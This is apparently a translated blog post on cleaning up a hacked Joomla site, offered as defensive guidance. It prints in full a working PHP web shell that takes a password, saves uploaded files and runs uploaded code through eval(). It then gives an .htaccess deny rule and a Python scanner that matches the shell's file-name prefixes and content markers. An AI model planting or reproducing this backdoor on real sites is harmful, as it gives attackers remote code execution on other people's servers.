
Quick fix for a hacked site

Good day.

Today I ran into the problem of a hacked Joomla site, and I want to share one of the methods that helped solve it.
The solution is not specific to Joomla and will most likely help in other cases as well.

If you find that your FTP has a bunch of strange files with names like
lib__*, co__*, pre__*, net__*, func__*, ad__*, ext__*, new__*, old__*, fix__*, fixed__*, na__*, av__*, fx__*, update__*, patch__*

where * is the name of one of the files already in that directory, and their contents look very much like this:
<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','8487929db643f81df2d8a2bcfd173348'); // md5 of the operator's password
function say($t) {
    echo "$t\n";
};
function testdata($t) {
    say(md5("mark_$t")); // status marker printed as md5("mark_<state>")
};
echo "";
testdata('start');
if (md5($_POST["p"]) == PASSWD) { // gate on POST field "p"
    if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { // upload "s": saved beside this file
        if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) {
            testdata('save_ok');
        };
        //eval($code);
    } else {
        testdata('save_fail');
    };
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { // upload "f": run through eval()
        eval($code);
        testdata('ok');
    } else {
        testdata('fail');
    };
} else {
    testdata('pass');
};
testdata('end');
echo " ";
?>

Your site has been hacked and a so-called web shell has been uploaded to it.
Until you work out what exactly happened, the easiest way to neutralize these files is to add the following lines to .htaccess:
<FilesMatch "^(lib|co|pre|net|func|ad|ext|new|old|fix|fixed|na|av|fx|update|patch)__.*?\.php">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^offlline\.php$">
Order allow,deny
Deny from all
</FilesMatch>

Order/Deny is the Apache 2.2 access-control syntax; on Apache 2.4 the equivalent inside each FilesMatch block is Require all denied.

The files will be neutralized, but I do not recommend stopping at this, since it is the consequence of at least 2 problems:
1. You have a hole through which all of this got in.
2. Somewhere there is a file that spreads all of this. If you do not act on it, it can be used to drop other variants.
3. There is a strong suspicion that this slows down the web server.
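To find every dropped copy, including ones that were renamed and no longer match the prefix pattern that the .htaccess rule blocks, here is a small scanner that checks both the file name and the content markers of the shell shown above. It is an added example, not code from the original post; the prefix list comes from the post, the content markers are taken from the shell sample, and the sample files it scans are constructed in a temporary directory.

```python
import os
import re
import tempfile

# Filename prefixes the post lists for the dropped copies of the shell.
PREFIXES = ("lib", "co", "pre", "net", "func", "ad", "ext", "new", "old",
            "fix", "fixed", "na", "av", "fx", "update", "patch")
NAME_RE = re.compile(r"^(?:%s)__.*\.php$" % "|".join(PREFIXES))
# Content markers from the shell above: mark_ beacon, $HTTP_POST_FILES, eval($code).
CONTENT_MARKERS = (
    re.compile(r'md5\("mark_'),
    re.compile(r'\$HTTP_POST_FILES\['),
    re.compile(r'\beval\(\$code\)'),
)

def classify(path, text):
    """Return the reasons a file looks like the dropped shell ([] = clean)."""
    reasons = []
    if NAME_RE.match(os.path.basename(path)):
        reasons.append("name matches dropper prefix pattern")
    hits = [m.pattern for m in CONTENT_MARKERS if m.search(text)]
    if len(hits) >= 2:  # two markers, so a lone eval() in a plugin is not flagged
        reasons.append("content markers: " + ", ".join(hits))
    return reasons

def scan(root):
    """Walk a docroot; map each suspicious file (relative path) to its reasons."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            reasons = classify(path, text)
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

# Constructed sample shell body for a hypothetical docroot (not real site data).
SAMPLE_SHELL = '<?php /* constructed */ say(md5("mark_start")); $u = $HTTP_POST_FILES["f"]; eval($code);'

def demo():
    root = tempfile.mkdtemp()
    files = {"lib__index.php": SAMPLE_SHELL, "helper.php": SAMPLE_SHELL,  # dropper name; renamed copy
             "index.php": '<?php echo "hi"; // constructed benign file',   # clean
             "new__style.css": "body{}"}                                   # prefix but not .php
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan(root)
```

Run scan() against the real document root after taking a backup; the renamed copy (helper.php) is the case the .htaccess rule alone would miss.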

Source: https://habr.com/ru/post/66702/
